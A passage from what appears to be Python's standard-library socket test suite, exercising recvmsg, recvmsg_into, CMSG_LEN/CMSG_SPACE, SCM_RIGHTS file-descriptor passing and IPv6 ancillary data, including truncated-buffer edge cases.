self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
